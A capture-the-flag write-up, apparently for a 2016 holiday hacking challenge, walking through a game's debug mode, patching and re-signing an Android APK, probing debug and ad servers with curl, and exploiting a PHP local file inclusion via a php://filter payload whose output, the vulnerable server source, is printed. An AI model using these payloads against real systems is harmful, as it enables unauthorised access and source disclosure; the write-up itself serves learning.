A brown sack. A clove of garlic. A lunch. A piece of vitreous slag. A small pile of coal. 06* A jade figurine. A machine. 08* A huge diamond. A trophy case. A glass bottle. A quantity of water. A rope. A knife. A sword. A lamp. A broken lamp. A carpet. A pile of leaves. A troll. A bloody axe. A rusty knife. A burned-out lantern. A set of skeleton keys. A skeleton. 25* A bag of coins. 26* A platinum bar. A pearl necklace. A mirror.

Around object 200 something magical happened...

>GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: ? GDT>Entry: ? GDT>Entry: ? GDT>Entry: ? GDT>Entry: ? GDT>Entry: ? GDT>Entry: ? GDT>Entry: ? GDT>Entry: ? GDT>Entry: ? GDT>Entry: ? GDT>Entry: ? GDT>Entry: ? GDT>Entry: ? GDT>Entry: ? GDT>Entry: ?

We hit the end...let's see what the last few items are so we can grab our treasure.

GDT>ex >i You are carrying: A pair of hands. A breath. A flyer. A bird. A tree. A northern wall. A southern wall. A eastern wall. A western wall. A water. A Guardian of Zork. A compass rose. A mirror. A panel. A stone channel. A dungeon master. A ladder. A Elf.

An Elf!

Since I know I need to give the Elf some treasure, I give him the only thing in my inventory that might be treasure-ish, a bird that I dubbed "Puffington" to align with the spirit of the North Pole theme.

>look at elf The elf appears increasingly impatient. You are behind the white house. In one corner of the house there is a window which is open. >give elf bird "That wasn't quite what I had in mind", he says, tossing the bird into the fire, where it vanishes.


A quick visit to treasure/index list and I grab a treasure I know he'll like.

>gdt GDT>tk Entry: 154 Taken. GDT>ex >give elf egg The elf, satisified with the trade says - send email to "peppermint@northpolewonderland.com" for that which you seek. The elf says - you have conquered this challenge - the game will now end. Your score is 15 [total of 585 points], in 9 moves. This gives you the rank of Beginner.

I send a quick e-mail off to Peppermint and get the next audio file, "discombobulatedaudio3.mp3", for our trouble.

The Debug Server

Taking a look at the Nmap results doesn't reveal much detail about this server.

# nmap -A -p - dev.northpolewonderland.com Starting Nmap 7.12 ( https://nmap.org ) at 2016-12-17 22:01 EST Stats: 0:04:13 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 37.87% done; ETC: 22:12 (0:06:53 remaining) Nmap scan report for dev.northpolewonderland.com ( Host is up (0.023s latency). Other addresses for dev.northpolewonderland.com (not scanned): rDNS record for Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0) | ssh-hostkey: | 1024 a4:98:4c:b7:ba:53:71:ce:5c:b0:01:d6:66:2e:d2:e4 (DSA) | 2048 df:44:96:be:13:c7:13:8a:b4:4a:43:4d:5b:f4:d4:2f (RSA) |_ 256 b7:a2:a2:cc:d9:84:b4:34:98:4b:74:bc:4d:20:cd:90 (ECDSA) 80/tcp open http nginx 1.6.2 |_http-server-header: nginx/1.6.2 |_http-title: Site doesn't have a title (application/json). Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: WAP|general purpose Running: Actiontec embedded, Linux 2.4.X|3.X OS CPE: cpe:/h:actiontec:mi424wr-gen3i cpe:/o:linux:linux_kernel cpe:/o:linux:linux_kernel:2.4.37 cpe:/o:linux:linux_kernel:3.2 OS details: Actiontec MI424WR-GEN3I WAP, DD-WRT v24-sp2 (Linux 2.4.37), Linux 3.2 Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 12.04 ms 2 11.01 ms (

It does indicate "application/json" content-type but using the POST method to send JSON objects to the "index.php" file we found in the APK didn't return any error messages or clues.

To understand the function of the webserver better, I started rooting around in the APK looking for hints.

In the "SantaGram_4.2/res/values/strings.xml" file, the below stood out.

<string name="debug_data_collection_url">http://dev.northpolewonderland.com/index.php</string> <string name="debug_data_enabled">false</string>

That's interesting. It appears that debug data is sent to the URL but by default debug is disabled.

Digging into this further, looking at the decompiled code as Java in the "SantaGram_4.2/com/northpolewonderland/santagram/EditProfile.class" file shows strings that indicate "Remote debug logging" and a JSON object structure.

if (getString(2131165214).equals("true")) { Log.i(getString(2131165204), "Remote debug logging is Enabled"); i = 1; } for (;;) { getSupportActionBar().a(true); getSupportActionBar().b(true); getSupportActionBar().a("Edit Profile"); this.a = new ProgressDialog(this); this.a.setTitle(2131165208); this.a.setIndeterminate(false); if (i != 0) {} try { JSONObject localJSONObject = new JSONObject(); localJSONObject.put("date", new SimpleDateFormat("yyyyMMddHHmmssZ").format(Calendar.getInstance().getTime())); localJSONObject.put("udid", Settings.Secure.getString(getContentResolver(), "android_id")); localJSONObject.put("debug", getClass().getCanonicalName() + ", " + getClass().getSimpleName()); localJSONObject.put("freemem", Runtime.getRuntime().totalMemory() - Runtime.getRuntime().freeMemory()); new Thread(new EditProfile.1(this, localJSONObject)).start();

Looking up each of those functions and creating values for them didn't get me anywhere.

*NOTE* I later realize my mistake here - a lack of understanding of the getCanonicalName and getSimpleName. It was worth it in the end since I learned more.

# curl -X POST -H "Content-Type: application/json" "http://dev.northpolewonderland.com/index.php" -d '{"date":"20161114130421-0500","udid":"bacbec2c-dcf1-4237-8cf3-13d0bd4175a5","debug":"EditProfile, EditProfile","freemem":12345678}'

At this point, I came to the conclusion that the only way I was going to get the correct syntax for the JSON object the server expects was to run the APK.

For whatever reason I could not get the Android SDK emulator to work and resorted to downloading "free" Android emulators. I'm lucky I have a malware analysis VM as I have no doubt in my mind that this thing got compromised from all the shady Android emulators out there. Suffice to say, I found that the Chinese KOPLAYER worked well enough (it's designed to play Android games).

Once again, some helpful Elf hints gives us the tools and knowledge we need to beat the challenge.

<Shinny Upatree> - Hi, my name is Shinny Upatree. I'm one of Santa's bug bounty elves. <Shinny Upatree> - I'm the newest elf on Santa's bug bounty team. I've been spending time reversing Android apps. <Shinny Upatree> - Did you know Android APK files are just zip files? If you unzip them, you can look at the application files. <Shinny Upatree> - Android apps written in Java can be reverse engineered back into the Java form using JadX. <Shinny Upatree> - The JadX-gui tool is quick and easy to decompile an APK, but the jadx command-line tool will export the APK as individual Java files. <Shinny Upatree> - Android Studio can import JadX's decompiled files. It makes it easier to understand obfuscated code. <Shinny Upatree> - Take a look at Joshua Wright's presentation from HackFest 2016 on using Android Studio and JadX effectively.


<Bushy Evergreen> - Hi, I'm Bushy Evergreen. Shinny and I lead up the Android Analysis team. <Bushy Evergreen> - Shinny spends most of her time on app reverse engineering. I prefer to analyze apps at the Android bytecode layer. <Bushy Evergreen> - My favorite technique? Decompiling Android apps with Apktool. <Bushy Evergreen> - JadX is great for inspecting a Java representation of the app, but can't be changed and then recompiled. <Bushy Evergreen> - With Apktool, I can preserve the functionality of the app, then change the Android bytecode smali files. <Bushy Evergreen> - I can even change the values in Android XML files, then use Apktool again to recompile the app. <Bushy Evergreen> - Apktool compiled apps can't be installed and run until they are signed. The Java keytool and jarsigner utilities are all you need for that. <Bushy Evergreen> - This video on manipulating and re-signing Android apps is pretty useful.

I went ahead and decompiled the APK to get access to the smali files.

PS C:\Users\Mater Metal\Desktop> apktool d .\SantaGram_4.2.apk I: Using Apktool 2.2.1 on SantaGram_4.2.apk I: Loading resource table... I: Decoding AndroidManifest.xml with resources... I: Loading resource table from file: C:\Users\Mater Metal\AppData\Local\apktool\framework\1.apk I: Regular manifest package... I: Decoding file-resources... I: Decoding values */* XMLs... I: Baksmaling classes.dex... I: Copying assets and libs... I: Copying unknown files... I: Copying original files...

We saw in the "EditProfile.class" that there is a logical if-then statement that checks to see whether debugging is enabled. Since we know that it's not, we can change the Smali to proceed when debbing is disabled.

In the "SantaGram_4.2/smali/com/northpolewonderland/santagram/EditProfile.smali" file, we see the if-then statement.

invoke-virtual {p0, v0}, Lcom/northpolewonderland/santagram/EditProfile;->getString(I)Ljava/lang/String; move-result-object v0 const-string v3, "true" invoke-virtual {v0, v3}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z move-result v0 if-eqz v0, :cond_3 invoke-virtual {p0, v6}, Lcom/northpolewonderland/santagram/EditProfile;->getString(I)Ljava/lang/String; move-result-object v0 const-string v3, "Remote debug logging is Enabled" invoke-static {v0, v3}, Landroid/util/Log;->i(Ljava/lang/String;Ljava/lang/String;)I move v0, v1

To get what we want, we'll change "If equal" comparison.

if-eqz v0, :cond_3

To "If not equal".

if-nez v0, :cond_3

Next, we need to recompile the APK with our changes.

PS C:\Users\Mater Metal\Desktop> apktool b .\SantaGram_4.2 I: Using Apktool 2.2.1 I: Checking whether sources has changed... I: Smaling smali folder into classes.dex... I: Checking whether resources has changed... I: Building resources... I: Building apk file... I: Copying unknown files/dir...

After that, we'll need to sign the APK so that we can load it into our emulator.

PS C:\Users\Mater Metal\Desktop> & 'C:\Program Files\Java\jdk1.8.0_111\bin\keytool.exe' -genkey -v -keystore keys/SantaGram.keystore -alias SantaGram -keyalg RSA -keysize 1024 -sigalg SHA1withRSA -validity 10000 Enter keystore password: Re-enter new password: What is your first and last name? [Unknown]: Newt What is the name of your organizational unit? [Unknown]: Dev What is the name of your organization? [Unknown]: Dev What is the name of your City or Locality? [Unknown]: North Pole What is the name of your State or Province? [Unknown]: World What is the two-letter country code for this unit? [Unknown]: SA Is CN=Newt, OU=Dev, O=Dev, L=North Pole, ST=World, C=SA correct? [no]: yes Generating 1,024 bit RSA key pair and self-signed certificate (SHA1withRSA) with a validity of 10,000 days for: CN=Newt, OU=Dev, O=Dev, L=North Pole, ST=World, C=SA Enter key password for <SantaGram> (RETURN if same as keystore password): Re-enter new password: [Storing keys/SantaGram.keystore] PS C:\Users\Mater Metal\Desktop> & 'C:\Program Files\Java\jdk1.8.0_111\bin\jarsigner.exe' -keystore .\keys\SantaGram.keystore .\SantaGram_4.2\dist\SantaGram_4.2.apk -sigalg SHA1withRSA -digestalg SHA1 SantaGram Enter Passphrase for keystore: jar signed. Warning: No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-05-05) or after any future revocation date.

The APK successfully installs on KOPLAYER.

I'm continually impressed with the level of detail they put into this years challenges!

Finally, going to edit our profile we capture the requests that we need.

We were so close the first time! I just didn't properly list the full path...

# curl -X POST -H "Content-Type: application/json" "http://dev.northpolewonderland.com/index.php" -d '{"date":"20161114130421-0500","udid":"bacbec2c-dcf1-4237-8cf3-13d0bd4175a5","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":12345678}' {"date":"20161219192057","status":"OK","filename":"debug-20161219192057-0.txt","request":{"date":"20161114130421-0500","udid":"bacbec2c-dcf1-4237-8cf3-13d0bd4175a5","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":12345678,"verbose":false}}

You can see that it returns us a JSON object which includes a filename. One thing to note is that it also returns the original request we sent...but there is something additional in it that we didn't specify.


Let's flip that to "true" and see what happens.

# curl -X POST -H "Content-Type: application/json" "http://dev.northpolewonderland.com/index.php" -d '{"date":"20161114130421-0500","udid":"bacbec2c-dcf1-4237-8cf3-13d0bd4175a5","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":12345678,"verbose":true}' {"date":"20161219192600","date.len":14,"status":"OK","status.len":"2","filename":"debug-20161219192600-0.txt","filename.len":26,"request":{"date":"20161114130421-0500","udid":"bacbec2c-dcf1-4237-8cf3-13d0bd4175a5","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":12345678,"verbose":true},"files":["debug-20161219191712-0.txt","debug-20161219191950-0.txt","debug-20161219192001-0.txt","debug-20161219192057-0.txt","debug-20161219192353-0.txt","debug-20161219192406-0.txt","debug-20161219192457-0.txt","debug-20161219192600-0.txt","debug-20161224235959-0.mp3","index.php"]}

We are provided with a list of files on the server and find the locaion for our MP3 file, "debug-20161224235959-0.mp3".

The Banner Ad Server

Starting off with Nmap shows that we'll be dealing with another website.

# nmap -sC ads.northpolewonderland.com Starting Nmap 7.12 ( https://nmap.org ) at 2016-12-14 10:45 EST Nmap scan report for ads.northpolewonderland.com ( Host is up (0.071s latency). Other addresses for ads.northpolewonderland.com (not scanned): Not shown: 998 filtered ports PORT STATE SERVICE 22/tcp open ssh | ssh-hostkey: | 1024 cf:4c:e0:20:6d:e7:c6:b1:6b:9f:ac:75:45:16:b1:93 (DSA) | 2048 b9:a4:df:1e:34:0f:58:3e:2c:b7:e6:c6:77:0f:f5:3b (RSA) |_ 256 02:ec:fc:80:c0:fc:76:b3:cd:d2:64:39:af:3c:13:b3 (ECDSA) 80/tcp open http |_http-title: Ad Nauseam - Stupid Ads for Stupid People

Looking at the site shows some scrolling ads and in the top right is a "Login" button.

Peering under the hood at the source code reveals this snippit.

<script type="text/javascript">__meteor_runtime_config__ = JSON.parse(decodeURIComponent("%7B%22meteorRelease%22%3A%22METEOR%401.4.2.3%22%2C%22meteorEnv%22%3A%7B%22NODE_ENV%22%3A%22production%22%2C%22TEST_METADATA%22%3A%22%7B%7D%22%7D%2C%22PUBLIC_SETTINGS%22%3A%7B%7D%2C%22ROOT_URL%22%3A%22http%3A%2F%2Fads.northpolewonderland.com%22%2C%22ROOT_URL_PATH_PREFIX%22%3A%22%22%2C%22appId%22%3A%221vgh1e61x7h692h4hyt1%22%2C%22autoupdateVersion%22%3A%22537dcf6b4594db16ea2d99d0a920f2deeb7dc9f1%22%2C%22autoupdateVersionRefreshable%22%3A%2205c3f7dba9f3e15efa3d971acf18cab901dc0505%22%2C%22autoupdateVersionCordova%22%3A%22none%22%7D"));</script>

Decoding that gives us the JSON object below; however, the really important thing is the indication of the "meteor_runtime_config" telling us that it's a Meteor-built application.

{ "meteorRelease":"METEOR@", "meteorEnv":{ "NODE_ENV":"production", "TEST_METADATA":"{}" }, "PUBLIC_SETTINGS":{}, "ROOT_URL":"http://ads.northpolewonderland.com", "ROOT_URL_PATH_PREFIX":"", "appId":"1vgh1e61x7h692h4hyt1", "autoupdateVersion":"537dcf6b4594db16ea2d99d0a920f2deeb7dc9f1", "autoupdateVersionRefreshable":"05c3f7dba9f3e15efa3d971acf18cab901dc0505", "autoupdateVersionCordova":"none" }

I'm not familiar with the Meteor Framework but luckily the Elf Pepper Minstix has us covered with a few useful hints!

<Pepper Minstix> - Hi, my name is Pepper Minstix. I'm one of Santa's bug bounty elves. <Pepper Minstix> - Lately, I've been spreading time attacking JavaScript frameworks, specifically the Meteor Framework. <Pepper Minstix> - Meteor uses a publish/subscribe messaging platform. This makes it easy for a web page to get dynamic data from a server. <Pepper Minstix> - Meteor's message passing mechanism uses the Distributed Data Protocol (DDP). DDP is basically a JSON-based protocol useing WebSockets and SockJS for RPC and data management. <Pepper Minstix> - The good news is that Meteor mitigates most XSS attacks, CSRF attacks, and SQL injection attacks. <Pepper Minstix> - The bad news is that people get a little too caught up in messaging subscriptions, and get too much data from the server. <Pepper Minstix> - You should check out Tim Medin's talk from HackFest 2016 and the related blog post. <Pepper Minstix> - Also, Meteor Miner is a browser add-on for Tampermonkey to easily browse through Meteor subscriptions. Check it out!

Grabbing Meteor Miner and checking out the site shows a "Collection" called "HomeQuotes".

Note the "audio" field for the single record.

Throwing the below command into the Java Console gives us the output for the records.


Looking at the 5th element in the array gives us the information we're after, the URL for the next MP3 - "discombobulatedaudio5.mp3".

The Uncaught Exception Handler Server

For the exception server, we know based on the URL in the APK that there is an "exception.php" file. Browsing to that file gives us a message that we must use the HTTP POST method. Upon each "correct" request, I kept receiving error messages that divulged what the next expected piece was.

# curl -s "http://ex.northpolewonderland.com/exception.php" Request method must be POST # curl -X POST -s "http://ex.northpolewonderland.com/exception.php" Content type must be: application/json # curl -X POST -H "Content-Type: application/json" -s "http://ex.northpolewonderland.com/exception.php" -d '{"1":"1"}' Fatal error! JSON key 'operation' must be set to WriteCrashDump or ReadCrashDump. # curl -X POST -H "Content-Type: application/json" -s "http://ex.northpolewonderland.com/exception.php" -d '{"operation":"ReadCrashDump"}' Fatal error! JSON key 'data' must be set. # curl -X POST -H "Content-Type: application/json" -s "http://ex.northpolewonderland.com/exception.php" -d '{"operation":"ReadCrashDump","data":1}' Fatal error! JSON key 'crashdump' must be set. # curl -X POST -H "Content-Type: application/json" -s "http://ex.northpolewonderland.com/exception.php" -d '{"operation":"ReadCrashDump","data":1,"crashdump":1}' Fatal error! JSON key 'crashdump' must be set.

Playing around with the two operations, "WriteCrashDump" showed that I could pass data and access it through the website at the file name it provides me.

# curl -X POST -H "Content-Type: application/json" -s "http://ex.northpolewonderland.com/exception.php" -d '{"operation":"WriteCrashDump","data":"12345"}' { "success" : true, "folder" : "docs", "crashdump" : "crashdump-9dftyA.php" }


I tried various forms of injection to get the PHP to interpet on the website but it looked like the htmlentities and/or additional filtering was in play and preventing this. I did find a way to bypass these for XSS, but since that doesn't progress us, it was a bit pointless.

I did find that the ReadCrashDump operation would also allow me to look at the data submitted through WriteCrashDump.

# curl -X POST -H "Content-Type: application/json" -s "http://ex.northpolewonderland.com/exception.php" -d '{"operation":"WriteCrashDump","data":"<?php phpinfo();?>"}' { "success" : true, "folder" : "docs", "crashdump" : "crashdump-QpU4La.php" } # curl -X POST -H "Content-Type: application/json" -s "http://ex.northpolewonderland.com/exception.php" -d '{"operation":"ReadCrashDump","data":{"crashdump":"crashdump-QpU4La"}}' "<?php phpinfo();?>"

My cheeky PHP injection didn't work here either.

You'll note that the full filename isn't listed here so it's safe to assume that ".php" is being appended. This is further confirmed by just submitting it with the extension.

Fatal error! crashdump value duplicate '.php' extension detected.

It makes sense then that this is some sort of file inclusion and opens up a number of potential attack possibilities. This is further confirmed with the below test.

# curl -X POST -H "Content-Type: application/json" -s "http://ex.northpolewonderland.com/exception.php" -d '{"operation":"ReadCrashDump","data":{"crashdump":"../docs/crashdump-w5lXxR"}}' "test"

I wasn't able to get any directory traversal attacks working but I was reminded of another Elf hint.

<Sugarplum Mary> - Hi, I'm Sugarplum Mary. I'm a developer! <Sugarplum Mary> - I like PHP, it offers so much flexibility even though the syntax is straight out of 1978. <Sugarplum Mary> - PHP Filters can be used to read all kinds of I/O Streams. <Sugarplum Mary> - As a developer, I must be careful to ensure attackers can't use them to access sensitive files or data. <Sugarplum Mary> - Jeff McJunkin wrote a blog post on local file inclusions using this technique. <Sugarplum Mary> - I need to go back and make sure no one can read my source code using this technique. <Sugarplum Mary> - I love curl braces and semicolons.

Using this technique allows us to quickly get the sourcecode for the "exception.php" file and find the location of our next audio file, discombobulated-audio-6-XyzE3N9YqKNH.mp3.

# curl -X POST -H "Content-Type: application/json" -s "http://ex.northpolewonderland.com/exception.php?crashdump=123" -d '{"operation":"ReadCrashDump","data":{"crashdump":"php://filter/convert.base64-encode/resource=exception"}}' PD9waHAgCgojIEF1ZGlvIGZpbGUgZnJvbSBEaXNjb21ib2J1bGF0b3IgaW4gd2Vicm9vdDogZGlzY29tYm9idWxhdGVkLWF1ZGlvLTYtWHl6RTNOOVlxS05ILm1wMwoKIyBDb2RlIGZyb20gaHR0cDovL3RoaXNpbnRlcmVzdHNtZS5jb20vcmVjZWl2aW5nLWpzb24tcG9zdC1kYXRhLXZpYS1waHAvCiMgTWFrZSBzdXJlIHRoYXQgaXQgaXMgYSBQT1NUIHJlcXVlc3QuCmlmKHN0cmNhc2VjbXAoJF9TRVJWRVJbJ1JFUVVFU1RfTUVUSE9EJ10sICdQT1NUJykgIT0gMCl7CiAgICBkaWUoIlJlcXVlc3QgbWV0aG9kIG11c3QgYmUgUE9TVC5cbiIpOwp9CgkgCiMgTWFrZSBzdXJlIHRoYXQgdGhlIGNvbnRlbnQgdHlwZSBvZiB0aGUgUE9TVCByZXF1ZXN0IGhhcyBiZWVuIHNldCB0byBhcHBsaWNhdGlvbi9qc29uCiRjb250ZW50VHlwZSA9IGlzc2V0KCRfU0VSVkVSWyJDT05URU5UX1RZUEUiXSkgPyB0cmltKCRfU0VSVkVSWyJDT05URU5UX1RZUEUiXSkgOiAnJzsKaWYoc3RyY2FzZWNtcCgkY29udGVudFR5cGUsICdhcHBsaWNhdGlvbi9qc29uJykgIT0gMCl7CiAgICBkaWUoIkNvbnRlbnQgdHlwZSBtdXN0IGJlOiBhcHBsaWNhdGlvbi9qc29uLFxuIik7Cn0KCQojIEdyYWIgdGhlIHJhdyBQT1NULiBOZWNlc3NhcnkgZm9yIEpTT04gaW4gcGFydGljdWxhci4KJGNvbnRlbnQgPSBmaWxlX2dldF9jb250ZW50cygicGhwOi8vaW5wdXQiKTsKJG9iaiA9IGpzb25fZGVjb2RlKCRjb250ZW50LCB0cnVlKTsKCSMgSWYganNvbl9kZWNvZGUgZmFpbGVkLCB0aGUgSlNPTiBpcyBpbnZhbGlkLgppZighaXNfYXJyYXkoJG9iaikpewogICAgZGllKCJQT1NUIGNvbnRhaW5zIGludmFsaWQgSlNPTiEgXG4iKTsKfQoKIyBQcm9jZXNzIHRoZSBKU09OLgppZiAoICEgaXNzZXQoICRvYmpbJ29wZXJhdGlvbiddKSBvciAoCgkkb2JqWydvcGVyYXRpb24nXSAhPT0gIldyaXRlQ3Jhc2hEdW1wIiBhbmQKCSRvYmpbJ29wZXJhdGlvbiddICE9PSAiUmVhZENyYXNoRHVtcCIpKQoJewoJZGllKCJGYXRhbCBlcnJvciEgSlNPTiBrZXkgJ29wZXJhdGlvbicgbXVzdCBiZSBzZXQgdG8gV3JpdGVDcmFzaER1bXAgb3IgUmVhZENyYXNoRHVtcC5cbiIpOwp9CmlmICggaXNzZXQoJG9ialsnZGF0YSddKSkgewoJaWYgKCRvYmpbJ29wZXJhdGlvbiddID09PSAiV3JpdGVDcmFzaER1bXAiKSB7CgkJIyBXcml0ZSBhIG5ldyBjcmFzaCBkdW1wIHRvIGRpc2sKCQlwcm9jZXNzQ3Jhc2hEdW1wKCRvYmpbJ2RhdGEnXSk7Cgl9CgllbHNlaWYgKCRvYmpbJ29wZXJhdGlvbiddID09PSAiUmVhZENyYXNoRHVtcCIpIHsKCQkjIFJlYWQgYSBjcmFzaCBkdW1wIGJhY2sgZnJvbSBkaXNrCgkJcmVhZENyYXNoZHVtcCgkb2JqWydkYXRhJ10pOwoJfQp9CmVsc2UgewoJIyBkYXRhIGtleSB1bnNldAoJZGllKCJGYXRhbCBlcnJvciEgSlNPTiBrZXkgJ2RhdGEnIG11c3QgYmUgc2V0LiBcbiIpOwp9CmZ1bmN0aW9uIHByb2Nlc3NDcmFzaGR1bXAoJGNyYXNoZHVtcCkgewoJJGJhc2VwYXRoID0gIi92YXIvd3d3L2h0bWwvZG9jcy8iOwoJJG91dHB1dGZpbGVuYW1lID0gdGVtcG5hbSgkYmFzZXBhdGgsICJjcmFzaGR1bXAtIik7Cgl1bmxpbmsoJG91dHB1dGZpbGVuYW1lKTsKCQoJJG91dHB1dGZpbGVuYW1lID0gJG91dHB1dGZpbGVuYW1lIC4gIi5waHAiOwoJJGJhc2VuYW1lID0gYmFzZW5hbWUoJG91dHB1dGZpbGVuYW1lKTsKCQoJJGNyYXNoZHVtcF9lbmNvZGVkID0gIjw/cGhwIHByaW50KCciIC4ganNvbl9lbmNvZGUoJGNyYXNoZHVtcCwgSlNPTl9QUkVUVFlfUFJJTlQpIC4gIicpOyI7CglmaWxlX3B1dF9jb250ZW50cygkb3V0cHV0ZmlsZW5hbWUsICRjcmFzaGR1bXBfZW5jb2RlZCk7CgkJCQoJcHJpbnQgPDw8RU5ECnsKCSJzdWNjZXNzIiA6IHRydWUsCgkiZm9sZGVyIiA6ICJkb2NzIiwKCSJjcmFzaGR1bXAiIDogIiRiYXNlbmFtZSIKfQoKRU5EOwp9CmZ1bmN0aW9uIHJlYWRDcmFzaGR1bXAoJHJlcXVlc3RlZENyYXNoZHVtcCkgewoJJGJhc2VwYXRoID0gIi92YXIvd3d3L2h0bWwvZG9jcy8iOwoJY2hkaXIoJGJhc2VwYXRoKTsJCQoJCglpZiAoICEgaXNzZXQoJHJlcXVlc3RlZENyYXNoZHVtcFsnY3Jhc2hkdW1wJ10pKSB7CgkJZGllKCJGYXRhbCBlcnJvciEgSlNPTiBrZXkgJ2NyYXNoZHVtcCcgbXVzdCBiZSBzZXQuIFxuIik7Cgl9CgoJaWYgKCBzdWJzdHIoc3RycmNocigkcmVxdWVzdGVkQ3Jhc2hkdW1wWydjcmFzaGR1bXAnXSwgIi4iKSwgMSkgPT09ICJwaHAiICkgewoJCWRpZSgiRmF0YWwgZXJyb3IhIGNyYXNoZHVtcCB2YWx1ZSBkdXBsaWNhdGUgJy5waHAnIGV4dGVuc2lvbiBkZXRlY3RlZC5cbiIpOwoJfQoJZWxzZSB7CgkJcmVxdWlyZSgkcmVxdWVzdGVkQ3Jhc2hkdW1wWydjcmFzaGR1bXAnXSAuICcucGhwJyk7Cgl9CQp9Cgo/Pg== # curl -X POST -H "Content-Type: application/json" -s "http://ex.northpolewonderland.com/exception.php?cp","data":{"crashdump":"php://filter/convert.base64-encode/resource=exception"}}' |base64 -d <?php # Audio file from Discombobulator in webroot: discombobulated-audio-6-XyzE3N9YqKNH.mp3 # Code from http://thisinterestsme.com/receiving-json-post-data-via-php/ # Make sure that it is a POST request. if(strcasecmp($_SERVER['REQUEST_METHOD'], 'POST') != 0){ die("Request method must be POST.\n"); } # Make sure that the content type of the POST request has been set to application/json $contentType = isset($_SERVER["CONTENT_TYPE"]) ? trim($_SERVER["CONTENT_TYPE"]) : ''; if(strcasecmp($contentType, 'application/json') != 0){ die("Content type must be: application/json,\n"); } # Grab the raw POST. Necessary for JSON in particular. $content = file_get_contents("php://input"); $obj = json_decode($content, true); # If json_decode failed, the JSON is invalid. if(!is_array($obj)){ die("POST contains invalid JSON! \n"); } # Process the JSON. if ( ! isset( $obj['operation']) or ( $obj['operation'] !== "WriteCrashDump" and $obj['operation'] !== "ReadCrashDump")) { die("Fatal error! JSON key 'operation' must be set to WriteCrashDump or ReadCrashDump.\n"); } if ( isset($obj['data'])) { if ($obj['operation'] === "WriteCrashDump") { # Write a new crash dump to disk processCrashDump($obj['data']); } elseif ($obj['operation'] === "ReadCrashDump") { # Read a crash dump back from disk readCrashdump($obj['data']); } } else { # data key unset die("Fatal error! JSON key 'data' must be set. \n"); } function processCrashdump($crashdump) { $basepath = "/var/www/html/docs/"; $outputfilename = tempnam($basepath, "crashdump-"); unlink($outputfilename); $outputfilename = $outputfilename . ".php"; $basename = basename($outputfilename); $crashdump_encoded = "<?php print('" . json_encode($crashdump, JSON_PRETTY_PRINT) . "');"; file_put_contents($outputfilename, $crashdump_encoded); print <<<END { "success" : true, "folder" : "docs", "crashdump" : "$basename" } END; } function readCrashdump($requestedCrashdump) { $basepath = "/var/www/html/docs/"; chdir($basepath); if ( ! isset($requestedCrashdump['crashdump'])) { die("Fatal error! JSON key 'crashdump' must be set. \n"); } if ( substr(strrchr($requestedCrashdump['crashdump'], "."), 1) === "php" ) { die("Fatal error! crashdump value duplicate '.php' extension detected.\n"); } else { require($requestedCrashdump['crashdump'] . '.php'); } } ?>

Question 08 - The Goods

8) What are the names of the audio files you discovered from each system above? There are a total of SEVEN audio files (one from the original APK in Question 4, plus one for each of the six items in the bullet list above.) Please note: Although each system is remotely exploitable, we DO NOT expect every participant to compromise every element of the SantaGram infrastructure. Gain access to the ones you can. Although we will give special consideration to entries that successfully compromise all six vulnerabilities and retrieve their audio files, we happily accept partial answers and point out that they too are eligible for any of the prizes.

The 7 audio files are below.

Question 09 - Cyborgs Learning Chess

9) Who is the villain behind the nefarious plot.

I struggled with the audio quite a bit and realized I know absolutely nothing about audio forensics or mixing in general. Given that, I still managed to figure it out after hours of listening to this thing on loop and reversing, speeding up, speeding down, noise canceling, etc. I'd highly recommend Audacity for A) being free and B) having tons of capabilities in a user-friendly interface.

In the end, speeding it up 500%, changing the pitch to D#3, along with a few guesses, led me to the answer. The combined audio can be played below or downloaded here.

The first part of the audio made sense..."Father Christmas, Santa Claus". Ok, I get it. Santa, Father Christmas. Holiday Challenge. Roger that.

The second part though...it made no sense at all - "Father Christmas, Santa Claus, as Cyborgs learning Chess".

I spent the next two nights on the audio and honestly had a blast just hanging out in the final room ("The Corridor") with a bunch of other players. We'd shoot the breeze, talk to each other, give hints, and had a lot of laughs at each others frustrations. The social aspect of the game this year was fantastic and sorely lacking in any other CTFs.

Googling around for what I believe the phrase to be, I stumbled upon this link.

I began reading a lot of the Doctor Who stuff and noted the TARDIS on Santa's office desk.

I still couldn't figure out what the password was and tried lots of episode names, character names, and other Doctor Who/Christmas references to no avail. It wasn't until someone told me they thought the last audio file sounded like "chess" too, but it wasn't.

Knowing I had the audio wrong, I began trying to disect the last few words. The 4th audio file I just couldn't place. It sounded like "as" or "and" and I started typing in variations in Google.


When I saw the TARDIS Data Core website's profile for Santa, I thought it was odd that they listed "Jeff" as an alias but now it all made sense.

Trying the password "father christmas santa claus or as ive always known him jeff" opens the last door and pulls back the curtain on this mystery.

The answer to Question 9 is "Doctor Who", of course!

Question 10 - Why?!

10) Why had the villain abducted Santa? Please note: You can determine the plot and the identity of the villain with access to as few as five of the seven audio files. However, as stated above, participants who gain access to all seven audio files will be given special consideration. Again, you do not need to compromise all the SantaGram servers to answer items 9 and 10. Partial answers are completely welcomed and are certainly eligible to win.

Doctor Who looked into a time vortex and saw a universe where the Star Wars Holiday Special never happened, thus the world was better off not having suffered through the misery of seeing it. Basically, he's a mad man. Star Wars Holiday Special was awesome and Itchy, Malla, and Lumpy would agree!

Aarrr wgh ggwaaah!

Cranberry Pi Parts

Heat Sink - Elf House #2 - Upstairs

